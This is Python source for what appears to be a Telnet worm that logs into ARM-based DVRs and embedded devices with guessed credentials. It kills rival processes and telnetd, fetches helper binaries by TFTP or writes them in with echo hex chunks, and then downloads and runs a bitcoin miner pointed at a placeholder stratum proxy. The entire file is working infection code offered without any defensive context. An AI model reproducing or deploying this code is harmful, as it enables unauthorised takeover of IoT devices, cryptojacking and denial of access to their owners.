def attempt(self, username, password): stage = 0 try:

1.     def attempt(self, username, password):
2.         stage = 0
3.         try:
4.             tn = telnetlib.Telnet(self.host, 23, 5)
5.             tn.read_until("login", 3)
6.             tn.write(username + "\n")
7.             tn.read_until("pass", 3)
8.             tn.write(password + "\n")
9.             stage = 4
10.             out = tn.read_until("invalid", 5).lower()
11.  
12.             out = out.translate(None, " \r\n").rstrip().strip()
13.             if len(out) == 0:
14.                 return 1
15.  
16.             #check if it contains invalid, fail, again or unauthorized
17.             for fail in failChecks:
18.                 if fail in out:
19.                     return 0
20.  
21.             if "#" not in out and ">" not in out and "$" not in out and "~" not in out:
22.                 return 0
23.  
24.             self.azz = out
25.             stage = 5
26.  
27.             tn.write("cat /proc/version && echo -ne '\\x64\\x6f\\x6e\\x65'\n")
28.             procVersion = tn.read_until("done", 2).lower()
29.             procVersionWorked = "done" in procVersion #irrelevant
30.  
31.             if "dvrdvs" in out or (procVersionWorked and "arm" in procVersion):
32.                 self.killProcesses(tn, ["/var/run/", "/dev/"])
33.                 binaryResult = 2
34.                 if "v5l" in procVersion:
35.                     binaryResult = self.downloadBinary(tn, "/var/run/", "btcminer-arm", "http://<BINARIES>/", "-B -o stratum+tcp://<STRATUM PROXY>:3333")#old ass binary
36.                 else:#is a dvr
37.                     binaryResult = self.downloadBinary(tn, "/var/run/", "btcminer-arm", "http://<BINARIES>/", "-B -o stratum+tcp://<STRATUM PROXY>:3333 -t 4 -q")
38.                 if binaryResult == 0:
39.                     self.killProcesses(tn, ["telnetd"])
40.                     return 2
41.                 else:
42.                     return 0
43.             return 0 #we didnt infect shit but save it anyways
44.         except (socket.timeout, socket.error, EOFError):
45.             if stage >= 4:
46.                 return 0
47.             return 1
48.         except Exception, e:
49.             if stage >= 4:
50.                 return 0
51.             return 1
52.  
53.         def killProcesses(self, tn, containList):
54.             tn.write("ps && echo -ne '\\x64\\x6f\\x6e\\x65'\n")#lets just hope we have echo support...
55.             psResult = tn.read_until("done", 10)#slow ass piece of shit
56.             tokill = "echo start"
57.             for containing in containList:
58.                 if containing in psResult:
59.                     splitPs = psResult.replace("\r","").split("\n")
60.                     for psLine in splitPs:
61.                         if containing in psLine:
62.                             for part in psLine.split(" "):
63.                                 if part != "":
64.                                     tokill = tokill + "; kill -9 "+part
65.                                     break
66.                     tokill = tokill + "; echo -ne '\\x64\\x6f\\x6e\\x65'"
67.                     tn.write(tokill+"\n")#kill all illegal processes! ~.~
68.                     psResult = tn.read_until("done", 5)#lets lower from 10 to 5
69.                        
70.         def downloadBinary(self, tn, location, arch, web, args=""):
71.  
72.             if location.endswith("/"): #trim / off the end of location (we provide that)
73.                 location = location[:-1]
74.  
75.             if web.endswith("/"): #trim / off the end of web (we provide that)
76.                 web = web[:-1]
77.  
78.             tn.read_until("+!#CLEAN_READS#!+", 0.5)
79.  
80.             echoSupport = True
81.  
82.             if not echoSupport:
83.                 return -1 #there's no point in even trying, this box sucks!
84.  
85.             tn.write("cd %s && echo -ne '\\x64\\x6f\\x6e\\x65'\n" % (location))
86.             tn.read_until("done", 1)#irrelevant
87.  
88.  
89.             tn.write("tftp --help\n")
90.             tftpSupport = "octets" in tn.read_until("octets", 2)
91.  
92.             tn.read_until("+!#CLEAN_READS#!+", 0.5)
93.  
94.             if tftpSupport: #cool, we have tftp, THIS IS A LITTLE BROKEN AT THE MOMENT
95.                 tn.write("rm *; rm wget-%s; tftp -r wget-%s -g <TFTP SERVER> && echo -ne '\\x64\\x6f\\x6e\\x65'\n" % (arch, arch, arch))
96.                 tftpResult = tn.read_until("done", 10)
97.                 if not "done" in tftpResult:
98.                     print("NOT THERE, RETREAT")
99.                     return -2
100.                 tn.write("chmod u+x wget-%s && ./wget-%s %s/%s && echo -ne '\\x64\\x6f\\x6e\\x65'\n" % (arch, arch, web, arch))
101.                 tftpResult = tn.read_until("done", 10)
102.                 if not "done" in tftpResult:
103.                     return -2
104.                 tn.write("chmod u+x %s && ./%s %s && echo -ne '\\x64\\x6f\\x6e\\x65'\n" % (arch, arch, args));
105.                 tftpResult = tn.read_until("done", 10)
106.                 if not "done" in tftpResult:
107.                     return -2
108.                 tftpWorked = "done" in tftpResult
109.                 if tftpWorked:
110.                     return 0 #exited successfully
111.                 else:
112.                     #clean up and carry on
113.                     tn.write("rm %s; echo -ne '\\x64\\x6f\\x6e\\x65'\n" % arch)
114.                     tn.read_until("done", 1)
115.  
116.  
117.             #check if it's already there
118.             tn.write("./rand0-%s -h\n" % arch)
119.             writeWorked = "invalid" in tn.read_until("invalid", 2)
120.  
121.             if not writeWorked: #if we already downloaded it, why should we have to dl it again :P
122.                 #looks like we're going to do it the old fashioned way
123.                 binaryResult = self.writeBinary(tn, "wget-%s" % arch, "rand0-%s" % arch, location)
124.  
125.                 if binaryResult != 0:
126.                     return 1 #alright then, we have echo support but shit didnt work?
127.  
128.             #download and execute (if true) the binary
129.             tn.write("./rand0-%s %s/%s && chmod u+x %s && ./%s %s && echo -ne '\\x64\\x6f\\x6e\\x65'\n" % (arch, web, arch, arch, arch, args))
130.             echoWorked = "done" in tn.read_until("done", 15)
131.  
132.             if echoWorked:
133.                 return 0
134.             else:
135.                 return 1 #that didnt work, no idea why, but it didnt work.
136.             return 0
137.  
138.         #writes a binary using the echo -ne 'HEX' method
139.         def writeBinary(self, tn, localName, filename, location):
140.             if location.endswith("/"): #trim / off the end of writeTo (we provide that)
141.                 location = location[:-1]
142.  
143.             if localName in binaryLists: #store the binary lists in memory globally
144.                 echoList = binaryLists[localName]
145.             else:
146.                 echoList = binaryLists[localName] = self.getEchoList(localName, filename, location)#and there's our echoList!
147.  
148.             tn.write("rm -rf %s/%s\n" % (location, filename)) #delete the old one if it exists
149.             tn.read_until("+!#CLEAN_READS#!+", 0.5)
150.             for line in echoList: #write the echo list 1 by 1
151.                 tn.write(line + "\n")
152.                 result = tn.read_until("done", 2) #use the done as verification
153.                 if "done" in result:
154.                     continue
155.                 else:
156.                     return -1 #echo not supported or something went wrong
157.  
158.             tn.write("chmod u+x %s/%s && echo -ne '\\x64\\x6f\\x6e\\x65'\n" % (location, filename)) #delete the old one if it exists
159.             chmodded = "done" in tn.read_until("done", 2)
160.             if chmodded:
161.                 return 0
162.             else:
163.                 return -2 #whaaaaaaaaaaa
164.             return 0
165.                
166.         #get a list of echo commands we need to run
167.         #by iterating through a file and converting sections of bytes (50 a time)
168.         #into hex and then putting them into an echo -ne 'HEX' line
169.         #additionally, we write \\x64\\x6f\\x6e\\x65 (ascii: done) which will allow us to verify that worked after
170.         def getEchoList(self, localName, outputName, location):
171.             with open(localName, "rb") as f:
172.                 converted = None
173.                 result = []
174.                 byte = f.read(1)
175.                 i = 0
176.                 current = ""
177.  
178.                 while byte != "":
179.                     if i == 51:
180.                         i = 0
181.                         result.append("echo -ne '%s' >> %s/%s && echo -e '\\x64\\x6f\\x6e\\x65'" % (current, location, outputName))#\\x40 is for verification that it worked
182.                         current = ""
183.                     current = current + "\\x"+byte.encode("hex")
184.                     byte = f.read(1)
185.                     i = i + 1
186.  
187.                 if len(current) > 0:
188.                     i = 0
189.                     result.append("echo -ne '%s' >> %s/%s && echo -e '\\x64\\x6f\\x6e\\x65'" % (current, location, outputName))#\\x40 is for verification that it worked
190.                     current = ""
191.  
192.                 return result